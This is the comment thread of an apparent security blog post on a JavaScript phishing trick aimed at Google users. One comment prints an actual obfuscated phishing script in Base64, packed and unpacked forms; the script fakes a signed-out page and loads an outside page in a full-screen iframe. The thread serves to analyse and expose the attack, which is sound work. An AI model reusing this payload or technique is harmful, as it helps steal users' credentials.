Comments

Phishing via JavaScript Google this time not PayPal — 9 Comments

  1. Pingback: Phishing Trick Targeting Google Relies on Data URIs to Mask the Page's Real URL • Chrome Geek

  2. Pingback: Phishing Trick Targeting Google Relies on Data URIs to Mask the Page’s Real URL – 国内安全新闻资讯

  3. Pingback: Phishing Trick Targeting Google Relies on Data URIs to Mask the Page's Real URL - News Press

  4. OK, that didn’t want to unpack.
    Here is the NL4EmV one

    Base64:

    ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUo
    cGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50
    b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2Uo
    YyldPWtbY118fGUoYyl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7
    cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJl
    Z0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybiBwfSgnMy4yLmo9ImkgaCBr
    IGwgbiI7bXsoZygpe2YgMT0zLjIuOShcJzFcJyk7MS44PVwnNy94LTRcJzsxLmE9XCdiIDRcJzsx
    LmM9XCdcJzsyLnAoXCdCXCcpWzBdLkMoMSl9KCkpfUUoZSl7fTMuMi56Lnk9Ijw2IHM9XFwicjov
    L3EudC91L3cudlxcIiBvPVxcIkQ6IDA7QTogNSU7ZDo1JVxcIj48LzY+IjsnLDQxLDQxLCd8bGlu
    a3xkb2N1bWVudHx3aW5kb3d8aWNvbnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVu
    dHxyZWx8c2hvcnRjdXR8aHJlZnxoZWlnaHR8fHZhcnxmdW5jdGlvbnxoYXZlfFlvdXx0aXRsZXxi
    ZWVufFNpZ25lZHx0cnl8b3V0fHN0eWxlfGdldEVsZW1lbnRzQnlUYWdOYW1lfG53ZmFjaWxpdGll
    c3xodHRwfHNyY3x0b3B8YWJvdXR1c3xodG1sfHJlY2tpb3JlbnN8fG91dGVySFRNTHxib2R5fHdp
    ZHRofGhlYWR8YXBwZW5kQ2hpbGR8Ym9yZGVyfGNhdGNoJy5zcGxpdCgnfCcpLDAse30pKQ==

    Packed Java:

    eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘3.2.j=”i h k l n”;m{(g(){f 1=3.2.9(\’1\’);1.8=\’7/x-4\’;1.a=\’b 4\’;1.c=\’\’;2.p(\’B\’)[0].C(1)}())}E(e){}3.2.z.y=””;’,41,41,’|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|nwfacilities|http|src|top|aboutus|html|reckiorens||outerHTML|body|width|head|appendChild|border|catch’.split(‘|’),0,{}))

    Unpacked:

    window.document.title=”You have been Signed out”;
    try
    {
    (function()
    {
    var link=window.document.createElement(‘link’);
    link.type=’image/x-icon’;
    link.rel=’shortcut icon’;
    link.href=”;
    document.getElementsByTagName(‘head’)[0].appendChild(link)
    }
    ())
    }
    catch(e)
    {
    }
    window.document.body.outerHTML=””;

  5. Pingback: Злоумышленники обманывали жертв при помощи сервиса Google и data URI | IT-News.club

  6. We, the provider of the URL Shortner service “zg.al” a.k.a. Zeneligroup Redirection Service will take all the steps to remove those suspicious redirections and soon include a intelligent filter, to prevent any offence of Phishing.

    Please contact me if you have any questions

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.